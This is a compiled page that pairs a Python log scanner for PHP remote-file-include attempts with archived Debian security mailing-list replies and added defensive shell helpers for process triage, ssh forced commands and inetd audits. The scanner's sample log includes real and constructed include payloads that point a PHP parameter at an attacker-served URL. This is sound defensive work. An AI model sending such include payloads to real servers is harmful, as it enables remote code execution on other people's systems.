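def remote_url_params(target: str) -> list:
    """(name, value) pairs in the request's query string whose value is an absolute URL.
    parse_qsl already percent-decodes, so HTTP%3A%2F%2F... is caught as well."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(value.strip())]


def scan(lines) -> list:
    """One finding per request that looks like a remote-include attempt.

    self_hosted marks the case from the thread: the include URL points back at
    the client's own address, i.e. the requester is serving the payload itself."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = remote_url_params(rec["target"])
        if not hits:
            continue
        findings.append({
            "ip": rec["ip"],
            "path": urlsplit(rec["target"]).path,
            "params": hits,
            "status": int(rec["status"]),
            "ua": rec.get("ua") or "",
            "self_hosted": any(rec["ip"] in value for _, value in hits),
        })
    return findings


SAMPLE_LOG = [
    # the line quoted in the thread
    '142.176.141.5 - - [29/Aug/2004:21:51:47 +0200] "GET /path/to/index.php?p=http://142.176.141.5:113/ HTTP/1.1" 200 2979 "-" "curl/7.10.3 (i686-pc-linux-gnu) libcurl/7.10.3 OpenSSL/0.9.7a zlib/1.1.4"',
    # constructed: a normal visitor using the same parameter legitimately
    '192.0.2.10 - - [29/Aug/2004:21:52:03 +0200] "GET /path/to/index.php?p=about HTTP/1.1" 200 1813 "http://www.example.com/" "Mozilla/5.0"',
    # constructed: same pattern with the scheme upper-cased and percent-encoded
    '198.51.100.7 - - [29/Aug/2004:21:53:11 +0200] "GET /path/to/index.php?p=HTTP%3A%2F%2F198.51.100.7%2Fcmd.txt%3F HTTP/1.0" 200 2979 "-" "-"',
]


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    for f in scan(source):
        print("%s %s params=%s status=%d self_hosted=%s"
              % (f["ip"], f["path"], f["params"], f["status"], f["self_hosted"]))
```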
Re: apache / exe process taking 99 % cpu
On Wed, Sep 01, 2004 at 12:25:19AM +0200, Timo Veith wrote:
> On Tuesday 31 August 2004 03:24, Marcin Owsiany wrote:
> > On Tue, Aug 31, 2004 at 12:59:48AM +0200, Timo Veith wrote:
> > > On Monday 30 August 2004 21:06, Marcin Owsiany wrote:
> > >
> > > I added an iptables rule to the OUTPUT chain dropping all tcp packets to that box:port and guess what? My server was back idle again. No more 99 % cpu usage and the process now sits there.
> >
> > Seems like the process is a DoS zombie. Probably it opened as many connections to that machine as possible, and that caused the heavy CPU utilization.
>
> Hmm, there wasn't much network traffic, at least not significantly more than some other time.

A DoS does not necessarily mean a lot of traffic byte-wise. Remember that it only takes 2 packets sent and one received to initiate a TCP connection. And creating a huge number of connections certainly can be considered a DoS.

But anyway.. who knows... maybe it was a broken worm or something..

> There's more interesting news: As I stopped apache, the other apache proc immediately took port 443 and listened on it. A little while later also port 80 was in use. I connected to both of them with a browser and with telnet but there was no response. This fact made me think, that someone really hacked me, because port 80 and 443 can only be opened with root permissions.

Had the apache you shut down been listening on port 443?

I suspect there is an exploit which somehow infects an apache process (probably by exploiting some PHP memory management bug) and takes over the port when apache shuts down. I say so because I have seen such situations two times myself, and there also was no other sign of the attacker gaining root access.

Marcin
Re: apache / exe process taking 99 % cpu
On Tue, Aug 31, 2004 at 12:59:48AM +0200, Timo Veith wrote:
> On Monday 30 August 2004 21:06, Marcin Owsiany wrote:
> I added an iptables rule to the OUTPUT chain dropping all tcp packets to that box:port and guess what? My server was back idle again. No more 99 % cpu usage and the process now sits there.

Seems like the process is a DoS zombie. Probably it opened as many connections to that machine as possible, and that caused the heavy CPU utilization.

> And then it starts again connecting. I think this process tries to talk back to someone? Well, I am only guessing ...

Could be. I would unblock the rule for a while and record some of the traffic. Viewing it with something nice like ethereal could provide more information on the nature of those connections.

> I downloaded the ISO image from the F.I.R.E. Linux distribution to have some static binaries which I can trust.

Basically, if you don't trust your binaries, that means that you suspect the attacker got root access. And if they did, they probably installed a kernel backdoor. And if they did, then trusted binaries won't buy you anything. You need to boot off a trusted media if you want to be sure.

> I burned the image to a cd which I then mounted and tried to execute some of them but I only get
>
> su -: Permission denied
> [EMAIL PROTECTED] [/proc/18305] /mnt/cdrom/statbins/linux2.2_x86/who
> su: /mnt/cdrom/statbins/linux2.2_x86/who: Permission denied
> [EMAIL PROTECTED] [/proc/18305] uname -r
> 2.4.27
>
> Is it maybe because binaries for linux 2.2 cannot be run on a 2.4 kernel?

I don't think so. I suspect this is either a permissions (file or filesystem) or dynamic libs problem.

Marcin

PS: Please don't cc me. I really do read this list :-)
Re: apache / exe process taking 99 % cpu
On Mon, Aug 30, 2004 at 03:50:35PM +0200, Timo Veith wrote:
> My question is, have I been hacked?

Probably. Do you run PHP? Buggy PHP scripts are a common attack vector these days.

> Could that be a CGI program gone wild?

Yes, if the pid changes you noted are just independent processes. Less likely, if these are intentional fork()/exit() tricks done by one process (of course unless you don't trust your users).

> Of course I could stop apache, but that's not what I want. I'd like to figure out where this comes from.

Try "ls -l /proc/PID" and "ls -l /proc/PID/fd", these may reveal some useful information. Also run chkrootkit.

Marcin
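Two practical points run through this thread: Marcin's advice to look at /proc/PID and /proc/PID/fd of the runaway process (which is where Timo later found the PWD variable), and the "Permission denied" Timo got when running the trusted static binaries off the mounted CD, which Marcin attributes to file or filesystem permissions. The helpers below are an added example written for this page, not code from the thread; they wrap that /proc inspection in reusable functions and check the mount options of the filesystem a binary lives on, since a noexec mount is the usual reason an executable with correct mode bits is refused. Function names are this example's own and it assumes a Linux /proc.

```shell
#!/bin/sh
# Added example, not from the thread: triage helpers for a suspicious PID in
# the spirit of "ls -l /proc/PID" and "ls -l /proc/PID/fd", plus a
# mount-option check for the "Permission denied" Timo saw on the CD binaries.
# Assumes a Linux /proc; all names are this example's own.

# Target of the /proc/PID/exe symlink: the binary actually running, even when
# the process rewrote its argv[0] or the file was deleted after it started.
proc_exe() {
    readlink "/proc/$1/exe" 2>/dev/null
}

# Value of one environment variable ($2) of process $1. environ is
# NUL-separated, which is why reading the PWD Timo found there needs tr.
proc_env_var() {
    tr '\0' '\n' 2>/dev/null < "/proc/$1/environ" | sed -n "s/^$2=//p"
}

# Human-readable summary: exe, cwd, root, cmdline, PWD and open descriptors
# (sockets show as "socket:[inode]", unlinked files carry "(deleted)").
proc_triage() {
    pid=$1
    [ -d "/proc/$pid" ] || { echo "no such process: $pid" >&2; return 1; }
    echo "== pid $pid =="
    for link in exe cwd root; do
        printf '%-7s %s\n' "$link:" "$(readlink "/proc/$pid/$link" 2>/dev/null || echo '(unreadable)')"
    done
    printf 'cmdline: '; tr '\0' ' ' 2>/dev/null < "/proc/$pid/cmdline"; echo
    printf 'PWD:     %s\n' "$(proc_env_var "$pid" PWD)"
    echo "open fds:"
    ls -l "/proc/$pid/fd" 2>/dev/null | sed '1d;s/^/  /'
}

# Mount options of the filesystem holding path $1, taken from /proc/mounts.
# The last matching entry wins, since later mounts shadow earlier ones.
mount_opts_for() {
    mp=$(df -P "$1" | awk 'NR == 2 { print $6 }')
    awk -v mp="$mp" '$2 == mp { o = $4 } END { if (o != "") print o }' /proc/mounts
}

# 0 if that filesystem is mounted noexec: a trusted static binary copied from
# a CD then answers "Permission denied" although it is mode 0755.
is_noexec_mount() {
    mount_opts_for "$1" | tr ',' '\n' | grep -qx noexec
}

# Demo: ./proc_triage.sh PID [path-to-binary]
if [ -n "${1:-}" ]; then
    proc_triage "$1"
    if [ -n "${2:-}" ]; then
        if is_noexec_mount "$2"; then
            echo "$2 is on a noexec mount: $(mount_opts_for "$2")"
        else
            echo "$2: mount options $(mount_opts_for "$2")"
        fi
    fi
fi
```

Run it against the PID from `ps` before killing anything: an `exe` link that ends in "(deleted)", a `cwd` inside a world-writable directory such as /tmp, or a long list of `socket:[...]` descriptors for a process that should be idle are the findings that matter. When the binary on the CD fails with "Permission denied", `is_noexec_mount /mnt/cdrom/statbins/linux2.2_x86/who` tells you whether remounting with `exec` (or copying the file to a non-noexec filesystem) is the fix, before suspecting the kernel version.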
Re: apt-get upgrade and kernel images
On Tue, Mar 02, 2004 at 10:18:15AM +0200, Riku Valli wrote:
> Yes, but for me it was quite confusing that at first installation the kernel is not a package.

AFAIK it will be, starting with sarge.

Marcin
Re: services installed and running out of the box
On Fri, Sep 26, 2003 at 02:06:01PM -0400, Matt Zimmerman wrote:
> > He wants the service, he just wants it only for local use.
>
> That is not something that should be handled at the package level.

Why not? The boot-floppies already set the locale for the whole system. I think it would be nice if there was a global setting stating whether all services should be local-only or available to the outside. Of course it would mean (ab)using debconf in every such package...

regards
Marcin
Re: ProFTPD ASCII File Remote Compromise Vulnerability
On Tue, Sep 23, 2003 at 04:13:02PM -0500, Jeff Bender wrote:
> Thanks. Do you happen to have a link where this might be posted?

http://bugs.debian.org/212416

Marcin
security updates vs. proposed-updates
Hi!

Many people asked (in messages to [EMAIL PROTECTED]) how to get the security updates when there's a newer version of the package in question in proposed-updates, so I thought that posting this here could be useful.

Here's the way I do it recently: Add (for every package you need) an entry like this into /etc/apt/preferences:

  Explanation: override stable-updates/stable-security desync
  Package: ssh
  Pin: release l=Debian-Security
  Pin-Priority: 1001

This seems to work better than other suggested ways:
 - putting the package on hold (you need to override it when the security update is updated again)
 - removing proposed-updates from sources.list (2.4.x kernels from Herbert are there)

Maybe this could be added to the security team FAQ?

Disclaimer: I'm not a member of the security team.

Marcin
Re: Accepted kernel-source-2.4.20 2.4.20-3woody.12 (all source)
On Wed, Sep 10, 2003 at 08:32:32AM -0400, Herbert Xu wrote:
> Changes:
>  kernel-source-2.4.20 (2.4.20-3woody.12) stable; urgency=low
>  .
>    * Fixed conntrack DoS (netfilter):
>  .
>      include/linux/netfilter_ipv4/ip_conntrack.h
>      net/ipv4/netfilter/ip_conntrack_core.c
>      net/ipv4/netfilter/ip_conntrack_proto_tcp.c
>      net/ipv4/netfilter/ip_conntrack_proto_udp.c
>      net/ipv4/netfilter/ip_conntrack_standalone.c

I guess this is a fix for one of the vulnerabilities announced by the netfilter team at the beginning of August (Conntrack list_del() DoS):
http://lists.netfilter.org/pipermail/netfilter-devel/2003-August/012151.html

How about the second message posted on the same day (NAT Remote DOS (SACK mangle))?
http://lists.netfilter.org/pipermail/netfilter-devel/2003-August/012152.html

Herbert, aren't you going to patch it as well? Or maybe this is the bug fixed in kernel-source-2.4.3 (2.4.3-4), back in April (Bug#94216)? (The urls in the bug report are not valid any more, so I can't check.)

regards,
Marcin
Re: Curriculum
On Fri, Aug 08, 2003 at 11:47:09AM +0200, Matteo Vescovi wrote:
> On Friday 08 August 2003 06:10, Hugo Kavamura wrote:
> > Hugo Kazumi Kavamura
> > [...]
>
> What the h.ll does this mean?

Apparently some moron tries to find a job through SPAMming.

Marcin
Re: Kernel 2.4.21 Forwarding table vulnerability
On Mon, Jul 28, 2003 at 11:38:51AM -0700, Bruce Banner wrote:
> When were they patched? And how do I know when they are patched and when they are available? Is there somewhere I can find this info?

You could subscribe to debian-changes@lists.debian.org
See http://lists.debian.org/debian-changes/

Marcin

PS: please reply _below_ the citation and cut unneeded text.
Re: evolution
On Thu, Jun 26, 2003 at 08:40:38AM +0300, Martynas Domarkas wrote:
> Hi, it's me again and I have another stupid question: my evolution mailer in a short period of time repeatedly tries to connect to some strange hosts:
>
> tcp 0 1 192.168.0.1:33931 205.156.51.200:80 SYN_SENT
> [...]

I don't use evolution, but if it displays HTML messages, those could be requests to retrieve some objects embedded in some messages (images for example).

Just a thought.

Marcin
DSA-288 - a question
Hi!

DSA 288 [0] says:

] You will have to decide whether you want the security update which is
] not thread-safe and recompile all applications that apparently fail
]                                                     ^^
] after the upgrade, [...]

Does that mean that installing 0.9.6c-2.woody.3 and then recompiling e.g. stunnel against it will make it work fine even though openssl won't be thread-safe? If so, can anyone explain how recompiling an application can help? (There are no differences in the library interface between openssl-0.9.6c-2.woody.2 and openssl-0.9.6c-2.woody.3)

If not, then what does it refer to, and is there any way to make threaded apps work with openssl 0.9.6c-2.woody.3?

regards
Marcin

[0] http://www.debian.org/security/2003/dsa-288
Re: scan
On Thu, Apr 10, 2003 at 02:33:59PM -0300, danilo lujambio wrote:
> When I scanned with nmap this server, it shut down and rebooted.

Did it go through runlevel 6, or just simply crashed? If it was the latter, then it's probably broken hardware (it didn't reboot when scanning localhost, because lo is a software-only interface). Try pingflooding it (ping -f) and see if it crashes.

Marcin
Re: [Fwd: Re: LWN: Ptrace vulnerability in 2.2 and 2.4 kernels]
On Tue, Apr 01, 2003 at 02:30:17PM +0100, Dale Amon wrote:
> On Tue, Apr 01, 2003 at 03:36:15PM +0200, Maurizio Lemmo - Tannoiser wrote:
> > In a server environment, where there is no need to load modules at run-time, it could be a usable workaround, but, in a workstation machine, I don't think that's a great idea.
>
> In a server environment it is preferable not to compile with modules at all.

Why?

Marcin
Re: howcome there's no DSA for the latest Linux ptrace hole?
On Thu, Mar 20, 2003 at 05:29:56PM -0800, Jon wrote:
> On Thu, 2003-03-20 at 14:50, Tom Goulet (UID0) wrote:
> > Are the Debian kernels vulnerable to this hole?
>
> This post to BugTraq by Andrzej Szombierski (who found the problem) includes a sample exploit for x86. You can use it to see if you are vulnerable.

Isn't it the same bug for which Alan Cox (IIRC) provided a patch recently (which was applied to kernel-source-2.4.20 version 2.4.20-3woody.2)?
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00021.html

The exploit linked to from the mentioned post doesn't give me root on a box with this kernel...

Marcin
Re: machine monitoring packages
On Fri, Feb 14, 2003 at 05:00:42PM +0100, Dariush Pietrzak wrote:
> Goes like this: what is some tool and plot graphs... Why it's mrtg/rrdtool. It's great. But there is no alternative. And there should be.

What's wrong with gnuplot?

This is getting so off-topic...

Marcin
Re: snort-stats without mailing...
On Thu, Feb 13, 2003 at 12:15:55AM +0000, Ricardo Sousa wrote:
> How can I send/view snort stats without mailing them ?!?

ssh-keygen and scp is one way.

Marcin
Re: cluster on firewall?
On Thu, Feb 06, 2003 at 03:09:34AM +0200, Haim Ashkenazi wrote:
> Now, since the firewall is the most critical host, I want to setup some kind of failsafe, so even if that host dies all the traffic will go through another host. Since I don't even have an idea where to start, I'll appreciate any ideas/comments/pointers to documentations, etc...

What you are looking for is called a High-Availability Cluster (HAC). I don't maintain one myself, but have recently written a paper about HAC (only in Polish, sorry), and it looks like there is some really nice software for that. Below are the links from my paper -- some dates are in Polish, but that shouldn't be a problem.

[1] High-availability linux project, October 2002. http://linux-ha.org/.
[2] Harald Milz (hm AT seneca.muc.de). Linux high availability HOWTO, December 1998. http://www.ibiblio.org/pub/Linux/ALPHA/linux-ha/High-Availability-HOWTO.html.
[3] Rudy Pawul (rpawul AT iso ne.com). Getting started with Linux-HA (heartbeat), 2000. http://linux-ha.org/download/GettingStarted.html.
[4] Alan Robertson (alanr AT unix.sh). Linux-ha APIs. Talk given at LWCE/NYC in February, 2001. http://linux-ha.org/heartbeat/LWCE-NYC-2001/index.html.
[5] Alan Robertson (alanr AT unix.sh). Implementing HA servers on Linux: a brief tutorial on the Linux-HA heartbeat software. http://linux-ha.org/heartbeat/DevDen2002.pdf.
[6] Steve Blackmon (steve.blackmon AT transtech.cc). High-availability file server with heartbeat, 2001. http://www.samag.com/documents/s=1146/sam0109c/0109c.htm.
[7] Ram Pai. Heartbeat API. http://linux-ha.org/heartbeat/heartbeat_api.html.
[8] Horms (Simon Horman) (horms AT verge.net.au). Fake home page, 2002. http://www.vergenet.net/linux/fake/.
[9] Alan Robertson (alanr AT suse.com). Linux-HA heartbeat system design, 2000. http://www.linuxshowcase.org/2000/2000papers/papers/robertson/.
[10] Richard Ferri (rcferri AT us.ibm.com). Conversations: Introducing the open cluster framework, September 2002. http://www.linuxjournal.com/article.php?sid=6143.
[11] Ip load balancing (piranha), 2002. http://www.redhat.com/software/advancedserver/technical/piranha.html.
[12] Linux virtual server home page. http://www.linuxvirtualserver.org/.
[13] Joseph Mack (jmack AT wm7d.net). LVS-mini-HOWTO, November 2002. http://www.linuxvirtualserver.org/Joseph.Mack/mini-HOWTO/LVS-mini-HOWTO.html.
[14] mon home page, 2002. http://www.kernel.org/software/mon/.
[15] Keepalived home page, 2002. http://keepalived.sourceforge.net/.
[16] RFC2338 virtual router redundancy protocol. http://www.ietf.org/rfc/rfc2338.txt.
[17] Alexandre Cassen (acassen AT linux vs.org). Keepalived user guide, 2002. http://keepalived.sourceforge.net/pdf/UserGuide.pdf.
[18] Horms (Simon Horman) (horms AT verge.net.au). Creating linux web farms (linux high availability and scalability), November 2000. http://verge.net.au/linux/has/.
[19] Horms (Simon Horman) (horms AT verge.net.au). Ultra monkey project home page, 2002. http://www.ultramonkey.org/.
[20] Inc Mission Critical Linux. Mission critical linux website, 2002. http://www.missioncriticallinux.com/.
[21] Mission critical linux to deliver the first clustering solution specifically developed for e-commerce, March 2002. http://linuxpr.com/releases/1488.html.
[22] Motorola Computer Group. Advanced high availability services for linux, 2002. http://mcg.motorola.com/cfm/templates/swdetail.cfm?PageID=682&PageTypeID=10&SoftwareID=6&ProductID=202.
[23] Charles de Tranaltes. The road to six nines (6NINES) availability, February 2002. http://mcg.motorola.com/wp/index.cfm?pagetypeid=35&source=6.
[24] HP high-availability software, 2002. http://www.hp.com/products1/unix/highavailability/.
[25] Global filesystem home page. http://www.globalfilesystem.org/.
[26] Alan Robertson (alanr AT us.ibm.com). Resource fencing using STONITH. http://linux-ha.org/heartbeat/ResourceFencing_Stonith.html.
[27] Non-stop authentication with linux clusters. http://www-1.ibm.com/servers/esdd/articles/linux_clust/index.html.
[28] Coda filesystem home page, 2002. http://www.coda.cs.cmu.edu/.
[29] Inter Mezzo filesystem home page, 2002. http://inter-mezzo.org/.
[30] Bill von Hagen (vonhagen AT vonhagen.org). Using the InterMezzo distributed filesystem: getting connected in a disconnected world, 2002. http://www.linuxplanet.com/linuxplanet/reports/4368/1/.
[31] OCF. Open Cluster Framework project home page, 2002. http://opencf.org/.
[32] VA Cluster Manager project home page, 2002. http://vacm.sourceforge.net/.
[33] Philipp Reisner (philipp.reisner AT gmx.at). DRBD home page, 2002. http://www.complang.tuwien.ac.at/reisner/drbd/.
[34] Pavel Machek. NBD project home page. http://nbd.sourceforge.net/.
[35] Peter Breuer. Enhanced NBD project home page. http://www.xss.co.at/linux/NBD/.

Marcin
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote:
> Hi there!
>
> I've read a strange info at http://www3.ca.com/Virus/Virus.asp?ID=11513
> is it true? can it infect my debian systems? (woody, sid, potato)? how?

If you run an infected file - yes. Otherwise - I don't think so (they don't say if it exploits any vulnerabilities other than user's stupidity/ignorance).

Basically, if you run binaries from an unsafe source, you get what you deserve.

Marcin
Re: scp and sftp
On Mon, Apr 01, 2002 at 10:04:50AM -0300, Pedro Zorzenon Neto wrote:
> With the following commands, you can copy files without scp:
>
> $ cat localfile | ssh somehost 'cat > /somedir/remotefile'
> $ ssh somehost cat /somedir/remotefile > localfile
>
> So, it seems unuseful to disable scp and enable ssh...

You might want to enable ssh with /usr/bin/passwd as user's shell. Disabling scp then seems to make sense.

Marcin
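Pedro's two commands show why removing scp on its own restricts nothing: the client chooses the remote command, so `cat > file` does the same job. The restriction that does hold, and the one that makes Marcin's earlier "ssh-keygen and scp" answer for shipping snort stats safe, is a forced command on the key: sshd then ignores whatever command the client asks for and runs only the one in authorized_keys. The functions below are an added example written for this page, not code from either message; they build such an authorized_keys entry from a public key file and audit an existing file for keys that have no forced command. The key blob in the test is a constructed placeholder, and the function names, the `snortro` account and the 10.0.0.5 address in the comments are this example's own.

```shell
#!/bin/sh
# Added example, not from the thread: per-key forced commands in
# authorized_keys. The forced command replaces the command the client sends,
# so a key restricted this way can read the stats file and nothing else, no
# matter whether scp, "cat > file" or a shell was requested. All names here
# (functions, the snortro account, 10.0.0.5) are this example's own.

# Build an authorized_keys line for the public key in file $1 that always runs
# $2, with no PTY and no port, X11 or agent forwarding. $3, if given, becomes
# a from="..." pattern limiting which client address may use the key.
restricted_authorized_keys_line() {
    pubkey_file=$1
    forced_cmd=$2
    from_pattern=${3:-}
    # keep key type and base64 blob only; the trailing comment is dropped
    key=$(awk 'NR == 1 { print $1, $2 }' "$pubkey_file")
    opts="command=\"$forced_cmd\",no-pty,no-port-forwarding,no-X11-forwarding,no-agent-forwarding"
    [ -n "$from_pattern" ] && opts="from=\"$from_pattern\",$opts"
    printf '%s %s\n' "$opts" "$key"
}

# Forced command of one authorized_keys line ($1); prints nothing when the
# line carries no command="..." option, i.e. the key gets a full shell.
authorized_keys_forced_command() {
    printf '%s\n' "$1" | sed -n 's/.*command="\([^"]*\)".*/\1/p'
}

# Audit: print the lines of authorized_keys file $1 that have no forced
# command, which is what to look for when "disabling scp" was the only control.
unrestricted_keys() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | while IFS= read -r line; do
        [ -n "$(authorized_keys_forced_command "$line")" ] || printf '%s\n' "$line"
    done
}

# Deployment, as typed by the admin (not executed here):
#   ssh-keygen -t rsa -N '' -f ~/.ssh/snortstats           # dedicated key, no passphrase
#   restricted_authorized_keys_line ~/.ssh/snortstats.pub \
#       'cat /var/log/snort/stats.txt' 10.0.0.5 >> ~snortro/.ssh/authorized_keys
#   ssh -i ~/.ssh/snortstats snortro@sensor > stats.txt    # gets the stats, nothing else
```

The `from=` restriction ties the key to the host that pulls the stats, so a copied private key is useless elsewhere, and `no-pty,no-port-forwarding` closes the side channels a forced command alone leaves open. Note that the forced command is a property of the key, not of the account: a second, unrestricted key in the same authorized_keys file still grants a shell, which is what `unrestricted_keys` is there to catch.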
Re: MTAs
On Sun, Nov 18, 2001 at 03:02:30PM +1000, Paul Haesler wrote:
> > it is a Good Thing to have an MTA which does not run as root.
>
> I found the argument persuasive, and happily installed postfix. I do miss one thing from exim, however. Default debian installation of exim runs as mail:
>
> [paul@marge procmail] grep exim /etc/inetd.conf
> smtp    stream  tcp     nowait  mail    /usr/sbin/exim exim -bs

I don't know much about exim's guts, but is there a point in starting it as mail if it's SUID root?

-rwsr-xr-x    1 root     root       466308 sie 15 01:13 /usr/sbin/exim

Marcin
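Marcin's point generalises to any inetd entry: the user column only matters if the program it starts cannot regain root by itself, and a setuid-root binary can. The audit below is an added example written for this page, not code from the thread; it walks an inetd.conf, checks the setuid bit of each server program (the `s` in `-rwsr-xr-x`) and lists the entries where dropping to a non-root user buys nothing. The inetd.conf and the fake "exim" the demo creates are constructed in a temporary directory, and the function names are this example's own.

```shell
#!/bin/sh
# Added example, not from the thread: audit inetd.conf entries against the
# setuid bit of the server they start, the mismatch Marcin points at (inetd
# starts exim as "mail", but /usr/sbin/exim is setuid root regardless).
# The inetd.conf line and the fake server used in the demo are constructed.

# 0 if file $1 exists and has the setuid bit set.
is_setuid() {
    [ -u "$1" ]
}

# One report line per active entry of inetd.conf $1:
#   <service>: started as <user>, <program> setuid (owner <owner>)
#   <service>: started as <user>, <program> not setuid
# inetd's built-in services ("internal") and missing programs count as not setuid.
inetd_setuid_audit() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" |
    while read -r service socktype proto wait user program args; do
        if is_setuid "$program"; then
            owner=$(ls -ld "$program" | awk '{ print $3 }')
            printf '%s: started as %s, %s setuid (owner %s)\n' "$service" "$user" "$program" "$owner"
        else
            printf '%s: started as %s, %s not setuid\n' "$service" "$user" "$program"
        fi
    done
}

# Only the entries where the run-as user is not root but the program is
# setuid: the user column gives no privilege reduction there.
inetd_pointless_user_drops() {
    inetd_setuid_audit "$1" | grep -v ': started as root' | grep ' setuid (owner '
}

# Demo: build a throwaway inetd.conf and a setuid "server" in a temp dir
# (the bit can only be set on filesystems that keep setuid, e.g. not nosuid-mounted tmpfs on some systems).
demo_inetd_audit() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho fake exim\n' > "$dir/exim"
    chmod 4755 "$dir/exim"
    cat > "$dir/inetd.conf" <<EOF
# constructed sample inetd.conf
smtp    stream  tcp     nowait  mail    $dir/exim exim -bs
echo    stream  tcp     nowait  root    internal
EOF
    inetd_setuid_audit "$dir/inetd.conf"
    rm -rf "$dir"
}
```

On a real system run `inetd_setuid_audit /etc/inetd.conf`; an entry such as `smtp: started as mail, /usr/sbin/exim setuid (owner root)` is precisely the case in Paul's output, and the answer to Marcin's question is that the `mail` there changes which user exim starts as but not what it can become.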